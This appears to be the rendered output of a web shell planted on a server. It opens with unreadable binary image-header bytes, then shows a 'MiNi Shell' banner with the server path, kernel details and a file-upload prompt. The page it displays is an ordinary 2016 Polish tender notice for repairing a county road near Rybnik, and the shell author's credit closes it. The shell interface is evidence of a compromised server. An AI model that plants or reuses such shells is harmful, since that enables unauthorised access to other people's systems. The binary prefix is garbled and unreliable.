JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160530/136960-N-2016.html

<p class="kh_header"><b>Rybnik: Remont drogi powiatowej nr 5601S  na odcinku ulicy Sumińskiej w Gaszowicach i w Szczerbicach.</b><br>
<b>Numer ogłoszenia: 136960 - 2016; data zamieszczenia: 30.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 32 4227478, 4227874, faks 32 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi powiatowej nr 5601S  na odcinku ulicy Sumińskiej w Gaszowicach i w Szczerbicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest zadanie p.n. Remont  drogi powiatowej nr 5601S na odcinku ulicy Sumińskiej w Gaszowicach i Szczerbicach , od granicy z m. Sumina km umowny 1+997 do gr. z m. Jejkowice km umowny 0+000. Długość odcinka 1,997 km.    
Remont drogi na odcinku  długości 1,997 km, polega m.in. na: 
-    wykonaniu prawego pobocza bitumicznego o szerokości 1,50 m i obejmującego następujące roboty:
     wykonanie koryta na głębokość 53 cm, wykonanie dwuwarstwowej podbudowy zasadniczej  z  kruszywa łamanego (warstwa 
     dolna grubości 25 cm z kruszywa 0-63 mm i warstwa górna  grubości 15 cm z kruszywa 0-31,5 mm) na łącznej powierzchni  
     3244m2;
-   wykonaniu na całej szerokości (6,00+1,50)  warstwy  wyrównawczej z mieszanki mineralno-asfaltowej AC16P o średniej 
     grubości 3 cm na powierzchni 15 335 m2; ułożenie geosiatki  przeciwspękaniowej na powierzchni 15 335m2  oraz dwóch 
     warstw nawierzchni z betonu asfaltowego tj: warstwy wiążącej z mieszanki mineralno-asfaltowej AC16W  grub. 5 cm na 
     powierzchni 15 195 m2  i  warstwy ścieralnej z mieszanki mineralno-asfaltowej z AC11S grub. 5 cm na powierzchni 
    15 751m2;
-    na odcinku od km - 0+095,5 do km 0+000 istniejącą warstwę ścieralną projektuje się rozebrać  (poprzez frezowanie) i ułożyć 
     nową z betonu asfaltowego grubości 5 cm (mieszanka mineralno-asfaltowa AC11S);
-    na całym odcinku po stronie lewej ( na powierzchni 2895 m2 )należy umocnić pobocze na szerokość 1,50 m  warstwą 
     grubość 15 cm z destruktu (frezu) pozyskanego z rozbiórki  nawierzchni (37m3), pozostałą potrzebną ilość  materiału 
     zabezpiecza  Wykonawca.;
-     odtworzeniu  rowów przydrożnych (korekta niwelety podłużnej dna rowu, nowe ukształtowanie skarp i przeciwskarp), wraz 
      z  humusowaniem i obsianiem; a na odcinkach o spadku podłużnym  2,0% ÷3,0% umocnić darniną układaną na płask;
      a przy spadku powyżej 3,0% umocnić płytami ażurowymi 60x40x8 cm (dno rowu szerokości 0,40 m i skarpy do wysokości 0,40 m)
-     remoncie przepustów  drogowych (w km 0+811, 1+067 i 1+817) ;
-     wymianie rur przepustowych pod wszystkimi zjazdami indywidualnymi i publicznymi, na rury z PVC-U z wyjątkiem zjazdu na  
      ul. Leśną; wloty/wyloty projektowanych  przepustów zostaną umocnione w części dolnej betonowymi fundamentami 
      czołowymi, a w części górnej  obrukowane kostką kamienną na warstwie betonu.
 -    dostosowaniu wysokościowym zjazdów indywidualnych i publicznych do zmienionej  niwelety  krawędzi drogi, poprzez 
      wyrównanie mieszanką mineralno-asfaltową w przypadku nawierzchni bitumicznych, oraz przebrukowaniu z uprzednim 
      wyrównaniem podbudowy kruszywem  łamanym w przypadku nawierzchni z kostki  lub płyt betonowych, natomiast zjazdy 
      o   nawierzchni gruntowej zostaną utwardzone warstwą destruktu grubości 15 cm. 
Na krawędzi jezdni lub bitumicznego pobocza należy ustawić betonowy krawężnik najazdowy15x22 cm ułożony na ławie betonowej.  Na zjazdach o nawierzchni ulepszonej (z kostki, płyt betonowych itp.) dodatkowo na granicy pasa drogowego zostanie ustawiony krawężnik betonowy wtopiony 12x25 cm na ławie betonowej,  zaś krawędzie boczne zjazdów  umocni się obrzeżem betonowym 8x30 cm również na ławie betonowej.
-  w km 0+484-0+496 projektuje się peron przystanku autobusowego długości 12,0 m i szerokości 2,0m z kostki brukowej grubości 8 cm i podsypce cementowo-piaskowej na podbudowie z kruszywa łamanego grubości 20 cm; od strony jezdni ograniczony krawężnikiem  kamiennym 15x30 cm wystającym 12 cm nad krawędź nawierzchni na ławie betonowej,  pozostałe krawędzie zostaną umocnione obrzeżem betonowym 8x30 cm na ławie betonowej.
-    w km 1+588-1+611 projektuje się zatokę postojową dla 3 samochodów osobowych długości 6,0 m = 18,0 m, równolegle do osi drogi o konstrukcji jak dla pobocza bitumicznego; od strony jezdni ograniczony krawężnikiem  kamiennym 15x30 cm wystającym 12 cm nad krawędź nawierzchni; pozostałe krawędzie zostaną umocnione obrzeżem betonowym 8x30 cm, dla zabezpieczenia dolnej części przylegającego parkanu przed zasypaniem, projektuje się na całej długości (23,0 m) ustawić ściankę oporową z elementów prefabrykowanych typu L wysokości 1,50 m i szerokości u podstawy 0,85 m.
-    w km 1+581-1+588 projektuje się przejście dla pieszych (wysepka długości 8,0 m,  szerokości 1,50 m o konstrukcji jak dla peronu przystankowego; od strony jezdni ograniczony krawężnikiem  kamiennym 15x30 cm wystającym 12 cm nad krawędź nawierzchni; pozostałe krawędzie zostaną umocnione obrzeżem betonowym 8x30 cm .
-   odnowie oznakowania  poziomego farbą akrylową,  natomiast pionowego (z odzysku i nowe) z lokalizacją jak w projekcie organizacji ruchu;
-  ustawieniu poręczy ochronnych przy przepustach drogowych - strona prawa (24 m), barieroporęczy przy przepuście w km 1+817 (24m) oraz zainstalowanie punktowych elementów odblaskowych na granicy jezdni i bitumicznego pobocza na całej długości projektowanego odcinka za wyjątkiem skrzyżowania z ul. Jerozolimską po stronie prawej w ilości 330 szt.( należy uwzględnić zainstalowanie punktowych elementów odblaskowych aluminiowych z trzpieniem o odbłyśniku dwustronnym, dwubarwnym montowanych przez klejenie i wiercenie na granicy jezdni i bitumicznego pobocza ).

Powyższe zapisy i ilości wyszczególniają ważniejsze pozycje występujące w projekcie , opisane w wersji skróconej, celem orientacji  co do  zakresu   robót. 
Opis ten nie powiela przedmiaru robót  w pełnym zakresie (nie zawiera 100% pozycji przedmiaru), ani nie uwzględnia  pełnego zakresu prac przewidzianego projektem.  
Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu oraz technologii wykonania i odbioru robót zawierają: projekt budowlano- wykonawczy wraz  Specyfikacjami   Technicznymi Wykonania i Odbioru  Robót a także  przedmiar robót .  
Dołączony przedmiar robót stanowi  materiał pomocniczy do wyceny . Przedmiar robót nie stanowi samodzielnej  podstawy wyceny robót. Pozycje należy zestawiać z dokumentacją projektową i Specyfikacjami Technicznymi Wykonania i Odbioru  Robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.32.25-2, 45.23.32.28-3, 45.23.32.22-1, 45.45.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości : 20 000,00  złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku  w  tym zakresie. Wykonawca potwierdza spełnianie warunku 
   poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu. ( wg zał. Nr 3do siwz );</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w   postępowaniu, a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie  wykonał  co najmniej: 
-  jedno  zamówienie  polegające na budowie, przebudowie lub remoncie  drogi  o nawierzchni bitumicznej wraz                                
   z infrastrukturą drogową  o wartości co najmniej  1 500 000,00 złotych brutto  ;
	
Uznanie wykonanych robót uwarunkowane jest przedstawieniem  dowodów  potwierdzających , że roboty  te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż złoty polski, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP ogłoszony i obowiązujący w dniu opublikowania ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku  poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu ( wg zał. Nr 3 );</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca wykaże , że ma do dyspozycji (jako kierownika robót budowlanych) osobę   do pełnienia funkcji kierownika robót odpowiedzialną za kierowanie  robotami  budowlanymi , posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności drogowej bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2013 r. poz. 1409  z późn. zmianami) lub równoważne wydane na podstawie wcześniej obowiązujących przepisów bądź odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych. Zamawiający wymaga również , aby osoba wskazana do kierowania robotami brała udział w realizacji co najmniej jednego zakończonego zadania obejmującego budowę, przebudowę lub remont  drogi  o nawierzchni bitumicznej wraz  z infrastrukturą   drogową  o wartości co  najmniej                   1 500 000,00 złotych brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie warunku 
   poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu. ( wg zał. Nr 3 );</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony, opieczętowany i podpisany przez osobę uprawnioną/ osoby uprawnione do reprezentowania  
      wykonawcy   Formularz Ofertowy lub wg wzoru Załącznika Nr 1 do SIWZ;
                  2. Pełnomocnictwa (jeżeli  wykonawcę reprezentuje  pełnomocnik lub gdy wykonawcy wspólnie ubiegają się 
                                      o udzielenie zamówienia);
                                  3. Zobowiązanie w oryginale i  odpowiednie dokumenty  określone w SIWZ, w przypadku jeżeli Wykonawca  
                                      ubiegający się  o udzielenie zamówienia korzysta z potencjału innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania przyczyn, z  powodu których będzie 
      zagrożone dotrzymanie terminu zakończenia robót, w następujących  sytuacjach:
a)  jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem 
      okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego 
      przekazania terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności 
      miały lub  będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,

b)  gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z 
      powodu  technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych 
     warunków  atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za 
      które Wykonawca  ponosi odpowiedzialność,

c)  gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu 
     Umowy ze  względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub 
     opóźniają realizację   przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle 
     prowadzonymi przez inne   podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,

d)  jeżeli wystąpi brak możliwości wykonywania robót z powodu  nie dopuszczania do ich wykonywania przez 
    uprawniony organ  lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,

e)  wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

2. Wykonawca  jest uprawniony do żądania zmiany Umowy w zakresie materiałów, parametrów  technicznych, 
     technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu  Umowy w następujących 
      sytuacjach: 
a)	konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej,                      a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
b)	wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
c)	wystąpienia warunków Terenu objętego remontem odbiegających w sposób istotny od przyjętych                               w Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
d)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych                       lub materiałowych ze względu na zmiany obowiązującego prawa,
e)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.
3.     Zmiany dokonywane są poprzez złożenie wniosku o zmianę w formie pisemnej przez jedną ze stron wraz                   
        z określeniem  zmiany, podaniem uzasadnienia, czasu wykonania zmiany.

4.    Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy
        w formie  pisemnej w drodze aneksu do Umowy, pod rygorem nieważności,.

5.     W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:
a)	danych teleadresowych, 
b)	danych rejestrowych,
c)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.

6. Strony umowy zawierają stosowny aneks w celu dokonania zmian w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd  Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2016 godzina 08:45, miejsce: Zarząd  Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com